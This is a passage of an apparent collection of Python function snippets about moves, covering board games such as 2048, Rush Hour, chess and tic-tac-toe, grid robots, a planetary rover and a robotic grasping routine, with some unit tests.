moveTo, self.otherDevice):\n\t\t\t\t\tpossible=False\t#angle is too big to the other device\n\t\t\t#at this point, all test for \"possibility\" are performed.\n\t\t\tPlantingDevice.timesProf[0]+=time.clock()-tic\n\t\t\tdthini=pi/50.\n\t\t\tif not possible:\n\t\t\t\t#move in a spiral outwards\n\t\t\t\trTemp=a+b*thTemp\n\t\t\t\tdth=(pi/25.)/(rTemp/2.)\n\t\t\t\tthTemp+=dth\n\t\t\t\tthInit=thTemp #used to avoid infinite loop\n\t\t\t\tmoveTo=cart([rTemp,thTemp],opt)\n\t\t\t\twhile not inside(moveTo) or (self.otherDevice is not None and exceeds(self, moveTo, self.otherDevice)):\n\t\t\t\t\t#outside borders or too big angle.. make above expression shorter..\n\t\t\t\t\t#self.pSpots.append(self.m.getCartesian([rTemp,thTemp], opt))\n\t\t\t\t\trTemp=a+b*thTemp\n\t\t\t\t\tthTemp+=(pi/25.)/(rTemp/2.)\t\t\t\t\t\n\t\t\t\t\t#if abs(thTemp-thInit)>2*pi: #if radius is too big..\n\t\t\t\t\tif abs(thInit-thTemp)>2*pi:\n\t\t\t\t\t\tplant=False #we will not plant this time.\n\t\t\t\t\t\t#move to make it easier for the other head:\n\t\t\t\t\t\tif self.otherDevice is not None and self.lastPos==self.pos and self.struckLastTime:\t\t\t\t\t\t\n\t\t\t\t\t\t\tthIni=self.posCyl[1]-dthini\n\t\t\t\t\t\t\tthTemp=thIni\n\t\t\t\t\t\t\t\"\"\"if exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\tnp=cart([self.posCyl[0],thTemp])\"\"\" #old stuff... should be removed, right?\n\t\t\t\t\t\t\twhile inside(cart([self.posCyl[0],thTemp])) and not exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\tthTemp-=dthini #moves in order to make more space\n\t\t\t\t\t\t\tif thTemp==thIni: #it wasnt inside or exceeded\n\t\t\t\t\t\t\t\tcommands.extend(self.releaseDriver()) #releases driver, if he is used\n\t\t\t\t\t\t\t\tif exceeds(self, cart([self.posCyl[0],thTemp]), self.otherDevice):\n\t\t\t\t\t\t\t\t\t#we are struck! Wait for other device to move.\n\t\t\t\t\t\t\t\t\tself.m.stopControl() #we could have reached the end here.\n\t\t\t\t\t\t\t\t\tcommands.append((waitevent, self, self.otherDevice.moveEvent))\n\t\t\t\t\t\t\t\telse: #not inside, we have reached the end of the half circle\n\t\t\t\t\t\t\t\t\tself.debugPrint(\"end of pattern reached, passivates %s device\"%self.mountPoint)\n\t\t\t\t\t\t\t\t\tself.noMoreSpots=True\n\t\t\t\t\t\t\t\t\tself.m.stopControl() #we could have reached the end here.\n\t\t\t\t\t\t\t\t\tcommands.append((passivate, self))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmoveTo=cart([self.posCyl[0],thTemp+dthini])\n\t\t\t\t\t\t\t\ttraveltime=self.setPos(moveTo)\n\t\t\t\t\t\t\t\tself.debugPrint('clears for other head')\n\t\t\t\t\t\t\t\tcommands=self.cmnd(commands, traveltime,auto=auto['clearForOtherHead'])\n\t\t\t\t\t\tif plant:\n\t\t\t\t\t\t\tcommands=self.cmnd(commands, t['searchTime'],auto=auto['micrositeSelection'])\n\t\t\t\t\t\t\tself.m.timeConsumption['searchTime']+=t['searchTime']\n\t\t\t\t\t\treturn (commands,plant)\n\t\t\t\t\tmoveTo=cart([rTemp,thTemp],opt)\n\t\ttravelTime=self.setPos(moveTo)\n\t\tself.debugPrint('traveltime: %f'%travelTime)\n\t\tif plant: #this timeconsumption is only for succesfull...\n\t\t\tcommands=self.cmnd(commands, t['searchTime'],auto=auto['micrositeSelection'])\n\t\t\tself.m.timeConsumption['searchTime']+=t['searchTime']\t\t\n\t\tcommands=self.cmnd(commands, travelTime,auto=auto['moveToMicro'])\n\t\treturn (commands,plant)", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def motion(self):\n priority = {\"north\": [-1, 0], \"south\": [1, 0],\n \"east\": [0, 1], \"west\": [0, -1]}\n\n priority_list = [\"north\", \"south\", \"east\", \"west\"]\n\n critical_point = False\n while critical_point is False:\n row = self.curr_cell.row\n column = self.curr_cell.col\n\n if self.allow_to_move(priority_list[0],\n row + priority[priority_list[0]][0],\n column + priority[priority_list[0]][1]):\n\n self.move(priority_list[0])\n\n elif self.allow_to_move(priority_list[1],\n row + priority[priority_list[1]][0],\n column + priority[priority_list[1]][1]):\n\n self.move(priority_list[1])\n\n elif self.allow_to_move(priority_list[2],\n row + priority[priority_list[2]][0],\n column + priority[priority_list[2]][1]):\n\n self.move(priority_list[2])\n\n elif self.allow_to_move(priority_list[3],\n row + priority[priority_list[3]][0],\n column + priority[priority_list[3]][1]):\n\n self.move(priority_list[3])\n\n else:\n # Robot isolated\n critical_point = True\n\n return self.curr_cell, self.path", "def make_move(move):\n global manatee_pos\n global hyacinths\n global hyacinth_pos\n\n # Ends the program if movement is out of bounds\n if move == (0, 0):\n return None\n new_pos = (manatee_pos[0] + move[0], manatee_pos[1] + move[1])\n if new_pos[0] < 0 or new_pos[0] >= len(map):\n return None\n if new_pos[1] < 0 or new_pos[1] >= len(map[new_pos[0]]):\n return None\n\n entity = map[new_pos[0]][new_pos[1]]\n if entity == \"#\" or entity == \"G\":\n # Runs if movement is impossible\n return None\n if entity == \" \" or entity == \".\":\n # Runs if normal movement is possible\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return None\n if entity == \"O\":\n # Runs if manatee wins game\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return \"win\"\n if entity == \"\\\\\":\n # Runs if manatee eats hyacinth\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n hyacinths += 1\n if len(hyacinth_pos) == hyacinths:\n map[grate_pos[0]][grate_pos[1]] = \"O\"\n return None\n if entity == \"*\":\n # Checks if manatee can push boat\n if move[0] == 0:\n new_boat_pos = (new_pos[0] + move[0], new_pos[1] + move[1])\n if new_boat_pos[0] < 0 or new_boat_pos[0] >= len(map):\n return None\n if new_boat_pos[1] < 0 \\\n or new_boat_pos[1] >= len(map[new_boat_pos[0]]):\n return None\n if map[new_boat_pos[0]][new_boat_pos[1]] == \" \":\n map[new_boat_pos[0]][new_boat_pos[1]] = \"*\"\n map[new_pos[0]][new_pos[1]] = \"M\"\n map[manatee_pos[0]][manatee_pos[1]] = \" \"\n manatee_pos = new_pos\n return None\n return None", "def calculate_next_move(self, visit):\n self.depth += 1\n new_boards = []\n for vehicle_id in range(len(self.vehicles)):\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x += 1\n\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x -= 1\n\n else: #vertical\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y += 1\n\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y -= 1\n self.depth -= 1\n return new_boards", "def move_to_position2(self):", "def move(self, direction):\r\n # replace with your code\r\n initial_tile = self.__direct_top[direction]\r\n offset = OFFSETS[direction]\r\n direct_range = self.__direct_range[direction] \r\n backup_list = [[0 for dummy_col in range(self.grid_width)] for dummy_row in range(self.grid_height)]\r\n \r\n for initial_count, tile_cursor in enumerate(initial_tile):\r\n tem_list = []\r\n grid_cursor = tile_cursor\r\n for dummy_cursor in range(direct_range):\r\n \r\n tem_list.append(self.grid[grid_cursor[0]][grid_cursor[1]])\r\n grid_cursor = tuple(x + y for x,y in zip(grid_cursor,offset))\r\n \r\n new_list = merge(tem_list)\r\n if self.update_dict[direction] == 0:\r\n for col_cursor in range(direct_range):\r\n backup_list[col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] == 1: \r\n for col_cursor in range(direct_range):\r\n backup_list[self.grid_height -1 - col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] ==3:\r\n backup_list[initial_count] = new_list\r\n else:\r\n for col_cursor in range(direct_range):\r\n backup_list[initial_count][self.grid_width -1 - col_cursor] = new_list[col_cursor]\r\n \r\n flag = (self.grid == backup_list)\r\n self.grid = backup_list\r\n if not flag:\r\n self.new_tile()", "def action(self):\r\n\r\n\r\n #have we just started?\r\n if self.player_information[\"us\"][\"nTokens\"] == 0:\r\n move = generate_starting_move(self.player_information[\"us\"][\"player_side\"], self.board_array)\r\n return move\r\n\r\n #otherwise do minimax \r\n \r\n #start off with some shallow depth:\r\n if self.turn_no < 5:\r\n depth = 3\r\n else:\r\n depth = 2\r\n \r\n #set a constraint for search depth\r\n if self.total_tokens_on_board < 6:\r\n depth = 3\r\n elif self.total_tokens_on_board < 10:\r\n depth = 2\r\n else:\r\n depth = 1\r\n \r\n #have a time reference\r\n print(f'nthrows: {self.player_information[\"us\"][\"nThrowsRemaining\"]}')\r\n starting_time = int(round(time.time(), 0))\r\n #salvage result from minimax\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, depth, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, True, self.turn_no)\r\n\r\n #clean it up a bit \r\n print(self.board_dict)\r\n #tidy it up\r\n result = result[0]\r\n print(f'pre: {result}')\r\n #in case we get a bad move redo but make it very shallow\r\n if len(result) == 1 or result == (-5, -5):\r\n #force it to return a usable move\r\n counter = 0\r\n while (len(result) == 1) or (result == (-5, -5)):\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, 1, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, False, self.turn_no)\r\n result = result[0]\r\n counter += 1\r\n \r\n #if its taking too long\r\n if counter > 2: \r\n #generate one random possible move to use \r\n allied_tokens = [token for token in self.player_tokens if self.player_tokens[token] == \"us\"]\r\n move_list = generate_moves(self.board_dict, self.player_tokens, self.co_existance_dict, allied_tokens,\r\n self.player_information, self.board_array, True, \"all\")\r\n \r\n \r\n #if there are no moves\r\n if len(move_list) == 0:\r\n if self.player_information['us']['nThrowsRemaining'] > 0:\r\n throws = generate_possible_throws(self.board_dict, self.player_tokens, self.co_existance_dict, self.player_information, \"us\",\r\n self.player_information[\"us\"][\"player_side\"], self.board_array, \"all\" )\r\n result = random.choice(throws)\r\n \r\n else:\r\n result = random.choice(move_list)\r\n print(f'random: {result}')\r\n break\r\n\r\n print(f' inside: {result}')\r\n\r\n print(result)\r\n #otherwise clean it up\r\n if result[0] == 'throw':\r\n final_result = (result[0].upper(), result[1], result[2])\r\n else:\r\n final_result = (result[0].upper(), result[2], result[3])\r\n # return final result \r\n return final_result", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def move(self, direction, cycles):\n\t\tself.planet.tiles[self.y][self.x].set_occupant() # set occupant to the initial tile\n\t\tif direction == \"N\": # unit vector (0, -1)\n\t\t\ty_symbol = -1\n\t\t\tx_symbol = 0\n\t\tif direction == \"S\": # unit vector (0, 1)\n\t\t\ty_symbol = 1\n\t\t\tx_symbol = 0\n\t\tif direction == \"W\": # unit vector (-1, 0)\n\t\t\tx_symbol = -1\n\t\t\ty_symbol = 0\n\t\tif direction == \"E\": # unit vector (1, 0)\n\t\t\tx_symbol = 1\n\t\t\ty_symbol = 0\n\t\ti = 0\n\t\twhile i < int(cycles):\n\t\t\tnext_x = self.x + x_symbol # change x coordinate\n\t\t\tnext_y = self.y + y_symbol # change y coordinate\n\t\t\tnext_x, next_y = self.spherical(next_x, next_y) # get the next tile's coordinate\n\t\t\tif self.can_move(next_x, next_y): # check whether rover can move\n\t\t\t\t#reduce battery\n\t\t\t\tif self.planet.tiles[next_y][next_x].is_shaded():\n\t\t\t\t\tself.battery -= 1\n\t\t\t\tself.x = next_x\n\t\t\t\tself.y = next_y\n\t\t\t\ttile = self.planet.tiles[next_y][next_x]\n\t\t\t\ttile.set_occupant()\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tbreak", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.alphabeta(self, sample_space, affinity, depth_limit, -10000, 10001, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def make_move(self, row, column):\n\t\tif self.board[int(row)][int(column)] == '-':\n\t\t\tself.board[int(row)][int(column)] = self.marker\n\t\telse:\n\t\t\tprint(\"That spot is occupied, you messed up, you lose your turn for doing bad things\")", "def test_execute_instructions_raise_invalid_coordinate_exception(self):\n with self.assertRaises(InvalidCoordinateError):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions('RMMM')", "def computer_move(board,move,player):\r\n com_execution(board, move, player)", "def move_repeatedly():\n check = check50.run(run_command)\n check.stdin(\"WEST\").stdout(room_2_description)\n check.stdin(\"EAST\").stdout(room_1_name)\n check.stdin(\"WEST\").stdout(room_2_name)", "def do_unsafe(self):\r\n if(not self.isLegal()):\r\n raise IllegalMoveException(self.whyNotLegal())\r\n pawn = self.startCell.takePawn()\r\n self.endCell.placePawn(pawn)", "def process_move(self, retrieval, destination):\n self.board.attempt_move([retrieval[0], retrieval[1], destination[0]])", "def test_maze_move_4(self):\n maze_template = [['#', '#', '#', '#', '#', '#', '#'], \n ['#', '.', '.', '.', '.', '.', '#'], \n ['#', '.', '#', '#', '#', '.', '#'], \n ['#', '.', '.', '@', '#', '.', '#'], \n ['#', '@', '#', '.', '@', '.', '#'], \n ['#', '#', '#', '#', '#', '#', '#']]\n rat_J = a2.Rat(a2.RAT_1_CHAR, 1, 1)\n rat_P = a2.Rat(a2.RAT_2_CHAR, 1, 4)\n\n maze = a2.Maze(maze_template, rat_J, rat_P)\n old_sprout_count = maze.num_sprouts_left\n\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n\n self.assertEqual(maze.num_sprouts_left, old_sprout_count - 1)", "def execute_grasp(self, grasp_data=None, close_gripper=True, use_cartesian_plan=True, stop_at_pre_grasp=False, push_in_distance=None, use_debug_speed=False, force_threshold_magnitude=None, ee_speed_m_s=0.05):\n\n if grasp_data is None:\n grasp_data = self.state.grasp_data\n\n if push_in_distance is None:\n push_in_distance = self.graspingParams['grasp_push_in_distance']\n\n gripper_width = grasp_data.grasp_inner_diameter\n if gripper_width is not None:\n gripper_driver_width = gripper_width + self.graspingParams['gripper_width_offset']\n self.gripperDriver.sendGripperCommand(gripper_driver_width, force=20.0)\n else:\n self.gripperDriver.send_open_gripper_set_distance_from_current()\n\n rospy.sleep(0.5) # wait for 0.5 for gripper to move\n\n\n\n # compute the pre-grasp frame\n pre_grasp_distance = self.graspingParams['pre_grasp_distance']\n pre_grasp_frame_gripper = grasp_data.compute_pre_grasp_frame(distance=pre_grasp_distance)\n\n pre_grasp_ee_pose_stamped = self.makePoseStampedFromGraspFrame(pre_grasp_frame_gripper)\n\n # safety check\n is_safe = (GraspData.grasp_frame_safety_check(grasp_data.grasp_frame) and GraspData.grasp_frame_safety_check(pre_grasp_frame_gripper))\n if not is_safe:\n self.state.set_status(\"SAFETY_CHECK_FAILED\")\n return False\n\n\n # run the ik for moving to pre-grasp location\n graspLocationData = self.graspingParams[self.state.graspingLocation]\n above_table_pre_grasp = graspLocationData['poses']['above_table_pre_grasp']\n pre_grasp_ik_response = self.robotService.runIK(pre_grasp_ee_pose_stamped,\n seedPose=above_table_pre_grasp,\n nominalPose=above_table_pre_grasp)\n\n pre_grasp_pose = pre_grasp_ik_response.joint_state.position\n\n if not pre_grasp_ik_response.success:\n rospy.loginfo(\"pre grasp pose ik failed, returning\")\n self.state.set_status_ik_failed()\n self.state.print_status()\n return False\n\n # run the ik for moving to grasp location\n # for now just do IK, otherwise use cartesian space plan with force guards\n grasp_frame_ee_pose_stamped = self.makePoseStampedFromGraspFrame(grasp_data.grasp_frame)\n grasp_ik_response = self.robotService.runIK(grasp_frame_ee_pose_stamped,\n seedPose=above_table_pre_grasp,\n nominalPose=above_table_pre_grasp)\n\n grasp_pose = grasp_ik_response.joint_state.position\n if not grasp_ik_response.success:\n rospy.loginfo(\"pre grasp pose ik failed, returning\")\n self.state.set_status_ik_failed()\n self.state.print_status()\n return False\n\n # store for later use\n self.state.cache['grasp_ik_response'] = grasp_ik_response\n self.state.cache['pre_grasp_ik_response'] = pre_grasp_ik_response\n\n # move to pre-grasp position\n # we do this using a position trajectory\n print \"moving to pre-grasp\"\n pre_grasp_speed = self.graspingParams['speed']['pre_grasp']\n\n #### debugging\n speed = pre_grasp_speed\n if use_debug_speed:\n speed = DEBUG_SPEED\n self.robotService.moveToJointPosition(pre_grasp_pose,\n maxJointDegreesPerSecond=\n speed)\n\n self.state.set_status(\"PRE_GRASP\")\n print \"at pre-grasp pose\"\n\n if stop_at_pre_grasp:\n return\n\n if use_cartesian_plan:\n # move to grasp position using compliant cartesian plan\n\n move_forward_distance = pre_grasp_distance + push_in_distance\n print \"move_forward_distance\", move_forward_distance\n xyz_goal = move_forward_distance * np.array([1, 0, 0])\n ee_frame_id = \"iiwa_link_ee\"\n expressed_in_frame = ee_frame_id\n cartesian_grasp_speed = self.graspingParams['speed']['cartesian_grasp']\n cartesian_grasp_speed = ee_speed_m_s\n cartesian_traj_goal = \\\n control_utils.make_cartesian_trajectory_goal(xyz_goal,\n ee_frame_id,\n expressed_in_frame,\n speed=cartesian_grasp_speed)\n\n # add force guards\n # -z (gripper) direction in frame iiwa_link_ee,\n if force_threshold_magnitude is None:\n force_threshold_magnitude = self.graspingParams['force_threshold_magnitude']\n force_vector = force_threshold_magnitude * np.array([-1, 0, 0])\n force_guard = control_utils.make_force_guard_msg(force_vector)\n\n cartesian_traj_goal.force_guard.append(force_guard)\n action_client = self.robotService.cartesian_trajectory_action_client\n action_client.send_goal(cartesian_traj_goal)\n\n # wait for result\n action_client.wait_for_result()\n result = action_client.get_result()\n grasp_data.data['cartesian_trajectory_result'] = result\n\n print \"Cartesian Trajectory Result\\n\", result\n else:\n # move to grasp pose using standard IK\n speed = self.graspingParams['speed']['grasp']\n if use_debug_speed:\n speed = DEBUG_SPEED\n self.robotService.moveToJointPosition(grasp_pose,\n maxJointDegreesPerSecond=\n speed)\n\n\n # record current location of gripper (in world frame)\n # before closing the gripper\n\n pos, quat = self.get_transform(\"iiwa_link_ee\", \"base\")\n T_world_ee = transformUtils.transformFromPose(pos, quat)\n T_world_grasp = transformUtils.concatenateTransforms([self.graspToIiwaLinkEE, T_world_ee])\n self.state.cache['gripper_frame_at_grasp'] = T_world_grasp\n\n has_object = False\n if close_gripper:\n print \"closing gripper\"\n has_object = self.gripperDriver.closeGripper()\n\n if has_object:\n self.state.set_status(\"OBJECT_IN_GRIPPER\")\n print \"object in gripper\"\n else:\n self.state.set_status(\"GRASP_FAILED\")\n print \"grasp failed\"\n\n\n\n return has_object", "def getMove(self, grid):\n# global prune\n# prune = 0\n def Terminal(stateTup):\n \"\"\"\n Checks if the node is a terminal node\n Returns eval(state) if it is terminal\n \"\"\"\n state = stateTup[0]\n maxDepth = self.depthLimit\n if stateTup[1] == maxDepth:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n elif len(stateTup[0].getAvailableMoves()) == 0:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n\n def Eval(state):\n \"\"\"\n This is the eval function which combines many heuristics and assigns\n weights to each of them\n Returns a single value\n \"\"\"\n\n# H1 = htest2(state)\n# return H1\n H2 = h1(state)*monotonic(state)\n return H2\n\n\n def h1(state):\n Max = state.getMaxTile()\n left = len(state.getAvailableCells())/16\n if state.getCellValue([0,0]) == Max:\n v = 1\n else:\n v= 0.3\n Max = Max/1024\n return Max*left*v\n\n def mono(state):\n mon = 0\n# for i in range(4):\n# row = 0\n# for j in range(3):\n# if state.map[i][j] > state.map[i][j+1]:\n# row+=1\n# if row == 4:\n# mon += 1\n# for i in range(4):\n# column = 0\n# for j in range(3):\n# if state.map[j][i] > state.map[j+1][i]:\n# column +=1\n# if column == 4:\n# mon +=1\n#\n#\n# return mon/8\n for i in range(4):\n if all(earlier >= later for earlier, later in zip(grid.map[i], grid.map[i][1:])):\n mon+=1\n\n return mon/8\n\n def monotonic(state):\n cellvals = {}\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n for i in Path1:\n cellvals[i] = state.getCellValue(i)\n mon = 0\n for i in range(4):\n if cellvals.get((i,0)) >= cellvals.get((i,1)):\n if cellvals.get((i,1)) >= cellvals.get((i,2)):\n if cellvals.get((i,2)) >= cellvals.get((i,3)):\n mon +=1\n for j in range(4):\n if cellvals.get((0,j)) >= cellvals.get((1,j)):\n if cellvals.get((1,j)) >= cellvals.get((2,j)):\n if cellvals.get((2,j)) >= cellvals.get((3,j)):\n mon+=1\n return mon/8\n\n\n\n def htest2(state):\n score1 = 0\n score2 = 0\n r = 0.5\n\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n Path2 = [(3,0),(2,0),(1,0),(0,0),(0,1),(1,1),(2,1),(3,1),\n (3,2),(2,2),(1,2),(0,2),(0,3),(1,3),(2,3),(3,3)]\n valDict = {}\n for n in range(16):\n valDict[Path1[n]] = state.getCellValue(Path1[n])\n for n in range(16):\n if n%3 == 0:\n self.emergency()\n cell1 = valDict.get(Path1[n])\n cell2 = valDict.get(Path2[n])\n score1 += (cell1) * (r**n)\n score2 += (cell2) * (r**n)\n return max(score1,score2)\n\n\n def Maximize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n maxChild , maxUtility = None,-999999999\n state = stateTup[0]\n Map = self.dict.get(str(state.map))\n if Map == None:\n children = []\n for M in range(4):\n g = state.clone()\n if g.move(M):\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Minimize(childTup,A,B)[1]\n if utility > maxUtility:\n maxChild , maxUtility = child , utility\n if maxUtility >= B:\n# global prune\n# prune +=1\n break\n if maxUtility > A:\n A = maxUtility\n\n return (maxChild,maxUtility)\n\n\n def Minimize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n minChild , minUtility = None,999999999\n state = stateTup[0]\n Map= self.dict.get(str(state.map))\n if Map == None:\n cells= state.getAvailableCells()\n children = []\n tiles = [2,4]\n for i in cells:\n for j in tiles:\n g = state.clone()\n g.insertTile(i,j)\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Maximize(childTup,A,B)[1]\n if utility < minUtility:\n minChild , minUtility = child , utility\n if minUtility <= A:\n# global prune\n# prune +=1\n break\n if minUtility < B:\n B = minUtility\n\n return (minChild,minUtility)\n\n\n\n def decision(grid):\n \"\"\"\n Decision function which returns the move which led to the state\n \"\"\"\n child = 